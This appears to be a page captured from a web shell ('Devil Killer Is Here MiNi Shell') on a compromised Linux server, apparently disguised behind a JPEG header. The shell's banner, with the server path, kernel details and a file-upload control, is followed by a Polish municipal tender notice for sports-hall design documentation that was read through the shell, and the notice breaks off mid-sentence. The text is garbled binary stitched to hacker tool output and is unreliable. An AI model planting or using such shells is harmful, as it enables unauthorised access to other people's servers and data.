JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241126/0061725701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo – kosztorysowej dla budowy hal sportowych w miejscowości Wielkie Chełmy oraz Zalesie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Brusy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351251</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Na Zaborach 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brusy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-632</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523969300</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523969303</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@brusy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.brusy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo – kosztorysowej dla budowy hal sportowych w miejscowości Wielkie Chełmy oraz Zalesie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9163b9b6-cf03-4ecf-8845-65f206fca186</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00617257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00065494/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Budowa nowego boiska wielofunkcyjnego wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej im. Stanisława Sikorskiego w Wielkich Chełmach -DOKUMENTACJA PROJEKTOWA</p> <p class="mb-0">1.3.15 Budowa nowego boiska wielofunkcyjnego wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej w Zalesiu - DOKUMENTACJA PROJEKTOWA</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9163b9b6-cf03-4ecf-8845-65f206fca186 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl oraz poczty elektronicznej pod adresem: um@brusy.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5. Przeglądanie i pobieranie publicznej<br/>treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>6. Sposób sporządzenia i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią<br/>elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (zw. dalej „Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych).<br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów z 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych<br/>(zw. dalej „Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności”), z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy pzp, ww. regulacje nie będą miały<br/>bezpośredniego zastosowania.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów<br/>elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach Rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się<br/>jako załącznik), lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>„Formularza do komunikacji”).<br/>9. Zamawiający przekazuje link prowadzący bezpośrednio do widoku postępowania oraz Identyfikator (ID) postępowania na<br/>Platformie e-Zamówienia w Załączniku Nr 7 do SWZ. Dane postępowanie można wyszukać również ze strony głównej Platformy e-<br/>Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>10. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji<br/>wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z<br/>jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>11. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań, zawiadomień i zadawanie pytań. Formularze do komunikacji umożliwiają<br/>również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”) lub za pomocą poczty elektronicznej na adres<br/>e- mail: um@brusy.pl.<br/>12. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>13. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Cd. w zakładce: Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">24.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina Brusy, którą reprezentuje Burmistrz Brus, z siedzibą przy ul. Na Zaborach 1, 89-632 Brusy;<br/>	inspektorem ochrony danych osobowych u Administratora jest Magdalena Zarębska, <br/>z którą można kontaktować się e-mailem: iod@brusy.pl; pod numerem telefonu 52-39-69-300 lub pisemnie na adres: Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Wykonanie dokumentacji projektowo – kosztorysowej dla budowy hal sportowych w miejscowości Wielkie Chełmy oraz Zalesie” prowadzonym w trybie podstawowym;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia <br/>11 września 2019 r. Prawo zamówień publicznych (j.t. Dz. U. z 2024 r. poz. 1320) dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr ZP.271.26.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowo – kosztorysowej dla:<br/>Część I - budowy hali sportowej z wielofunkcyjnymi boiskami oraz zagospodarowaniem terenu przy Szkole Podstawowej im. Stanisława Sikorskiego w Wielkich Chełmach w ramach zadania pn. „Budowa nowego boiska wielofunkcyjnego wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej im. Stanisława Sikorskiego w Wielkich Chełmach”.<br/><br/>2.	Zakres rzeczowy dokumentacji projektowej obejmuje<br/>	Część I:<br/>	budowę hali sportowej z boiskiem o wymiarach 12 x 24 m wraz zapleczem szatniowo – sanitarnym, strzelnicą laserową z min. 4 stanowiskami strzeleckimi i łącznikiem do istniejącego budynku szkoły podstawowej, w tym:<br/>1)	roboty branży konstrukcyjno-budowlanej, obejmująca budowę nowego obiektu <br/>i przebudowę pomieszczeń istniejącego budynku szkoły,<br/>2)	roboty branży sanitarnej, w zakresie budowy instalacji c.o., c.w.u. wod. – kan. <br/>w nowobudowanym obiekcie oraz przebudowę ww. instalacji w obiekcie istniejącym, jeśli okaże się to niezbędne, zastosowanie odnawialnego źródła ciepła dla ogrzewania hali, dostosowanie instalacji w obu obiektach do projektowanych stref ppoż<br/>3)	roboty branży elektrycznej, w tym:<br/>a)	wykonanie instalacji elektrycznych oświetleniowych, gniazd wtykowych i oświetlenia awaryjnego w nowobudowanym obiekcie oraz budowa i przebudowa istniejących instalacji w części istniejącej, dostosowanie instalacji w obu obiektach do projektowanych stref ppoż<br/>b)	wykonanie instalacji fotowoltaicznej dla potrzeb nowobudowanego oraz istniejącego budynku z magazynem energii<br/>c)	wykonanie instalacji niskoprądowych w nowobudowanym obiekcie wraz z połączeniem z istniejącą instalacją w budynku szkoły oraz niezbędną jej przebudową,<br/>d)	wykonanie instalacji monitoringu dla nowobudowanego obiektu oraz terenu wokół budynków,<br/>4)	zagospodarowanie terenu, w tym m.in. wykonanie utwardzonych ciągów pieszych <br/>i jezdnych, miejsc parkingowych, urządzenie zieleni (trawniki, zieleń średnia i wysoka), wykonanie boiska wielofunkcyjnego,<br/>5)	wyposażenie hali w sprzęt sportowy (m.in. drabinki, kosze do koszykówki, słupy <br/>i siatki do siatkówki, tenisa i badmintona, bramki, podium, kozioł, skrzynia, materace itp.), rozkładaną na płycie boiska wykładzinę ochronną, scenę mobilną itp.<br/>	<br/>3.	Projekty należy opracować zgodnie z Rozporządzeniem Ministra Rozwoju z dnia <br/>11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (tj. Dz.U. z 2022 r. poz. 1679) – w ilości 4 egz. w wersji papierowej oraz w wersji elektronicznej w formacie PDF (płyta CD – 2 egz.).<br/>4.	Ponadto do obowiązków Wykonawcy należy sporządzenie:<br/>a)	Przedmiaru robót opracowany zgodnie z Rozporządzeniem Ministra Rozwoju <br/>i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (j.t. Dz. U. z 2021 poz. 2454) – (tylko w formie elektronicznej – pliki w formacie pdf i ath – płyta CD-2 egz.).<br/>Przedmiar winien zawierać:<br/>–	wyliczenia dla poszczególnych pozycji robót, z których wynikać będą ilości <br/>na poszczególne roboty,<br/>–	nakłady z tytułu robót demontażowych, transportu, zagospodarowania odpadów (ilości w tonach) oraz wszystkie inne nakłady mające wpływ na ryczałtowy koszt realizacji robót,<br/>–	odniesienie do Specyfikacji Technicznej Wykonania i Odbioru Robót.<br/>b)	Specyfikacji technicznej wykonania i odbioru robót budowlanych, opracowana zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno - użytkowego (j.t. Dz. U. z 2021 poz. 2454) - w wersji papierowej ilości 1 egz. oraz w wersji elektronicznej <br/>w formacie pdf i ath (płyta CD – 2 egz.).<br/>5.	Kosztorys inwestorski, opracowany zgodnie z Ministra Rozwoju i Technologii <br/>z dnia 20 grudnia 2021 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. <br/>z 2021 poz. 2458) - w wersji papierowej ilości 1 egz. oraz w wersji elektronicznej <br/>w formacie pdf i ath (płyta CD – 2 egz.). <br/>6.	Do dokumentacji projektowej Wykonawca załącza wykaz sporządzonych opracowań <br/>oraz pisemne oświadczenie, że jest wykonana zgodnie z umową i kompletna z punktu widzenia celu, któremu ma służyć.<br/>7.	Wykonawca na żądanie Zamawiającego zobowiązany jest do nieodpłatnego uaktualniania kosztorysów do czasu zakończenia inwestycji, jednak nie dłużej niż 3 lata od uzyskania ostatecznej decyzji o pozwoleniu na budowę.<br/>8.	Wykonawca zobowiązany jest do:<br/>a)	sprawdzenia istniejących warunków w terenie (udokumentowanie wizji lokalnej <br/>za pomocą dokumentacji fotograficznej)<br/>b)	wykonania badań podłoża gruntowego, a jeśli okaże się to konieczne dla realizacji przedmiotu zamówienia, wykonania operatu geotechnicznego.<br/>c)	Uzgodnienie projektu z właściwym wojewódzkim konserwatorem zabytków (budynki szkół są wpisane do GEZ)<br/>d)	wykonanie mapy do celów projektowych,<br/>e)	odbycia min. dwóch spotkań z Zamawiającym w celu ustalenia szczegółów zakresu rzeczowego dokumentacji w przypadkach szczególnych możliwa jest wideokonferencja),<br/>f)	wykonania i przedstawienia do uzgodnienia Zamawiającemu projektów budowlanych wszystkich branż, opracowanych w stopniu szczegółowości, umożliwiającym uzyskanie pozwolenia na budowę oraz wykonanie projektów technicznych;<br/>g)	przygotowania wniosku o pozwolenie na budowę / zgłoszenia robót nie wymagających pozwolenia na budowę w zakresie objętym sporządzoną dokumentacją projektową <br/>oraz wszelkich niezbędnych dokumentów i uzgodnień koniecznych do złożenia ww. wniosku oraz złożenie tego wniosku/zgłoszenia do właściwego organu a w przypadku braku konieczności uzyskania pozwolenia na budowę lub zgłoszenia robót Wykonawca uzyska zaświadczenie o tym od właściwego organu.<br/>h)	uzyskania wszelkich wymaganych prawem, w tym Prawem budowlanym i Prawem ochrony środowiska, uzgodnień formalno – prawnych, opinii, operatów, ekspertyz oraz decyzji, które są konieczne do uzyskania decyzji o pozwoleniu na budowę obiektów objętych dokumentacją projektową, przy użyciu własnych środków i na własny koszt.<br/>i)	udzielania wyjaśnień na etapie wyboru wykonawcy robót, a dotyczących rozwiązań projektowych,<br/>j)	przygotowanie i złożenie wniosku o pozwolenie na budowę, oraz dokonywanie niezbędnych wyjaśnień i uzupełnień na wezwanie organu wydającego pozwolenie na budowę,<br/>k)	pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych.<br/>9.	Sposób wykonania dokumentacji projektowej:<br/>a)	dokumentacja projektowa ma być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć. Dokumentacja będzie stanowić opis przedmiotu zamówienia <br/>do postępowania o udzielenie zamówienia publicznego na roboty budowlane w oparciu o ustawę Prawo zamówień publicznych<br/>b)	dokumentacja projektowa winna zostać wykonana w języku polskim, zgodnie <br/>z obowiązującymi przepisami prawa, normami technicznymi, zasadami wiedzy technicznej oraz powinna być opatrzona klauzulą o kompletności i przydatności z punku widzenia celu, któremu ma służyć.<br/>c)	dokumentacja projektowa winna zostać sprawdzona przez osobę posiadającą wymagane uprawnienia. Każdy egzemplarz dokumentacji winien być podpisany przez projektanta i sprawdzającego.<br/>d)	dokumentację projektową należy opracować w sposób czytelny, z wyłączeniem opisów ręcznych.<br/>e)	informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń powinny określać przedmiot umowy w sposób zgodny z ustawą Prawo zamówień publicznych oraz przepisami wykonawczymi do tej ustawy <br/>w sposób zapewniający zachowanie uczciwej konkurencji.<br/>f)	Wykonawca zobowiązuje się wykonać przedmiot zamówienia z uwzględnieniem postanowień zawartych w art. 29 Ustawy z dnia 11 września 2019 roku <br/>Prawo zamówień publicznych (Dz. U. z 2024 r. poz.1320) – tzn. przedmiotu zamówienia nie można opisywać poprzez wskazanie znaków towarowych, patentów lub pochodzenia.<br/>	W przypadku, gdy zastosowanie w/w jest 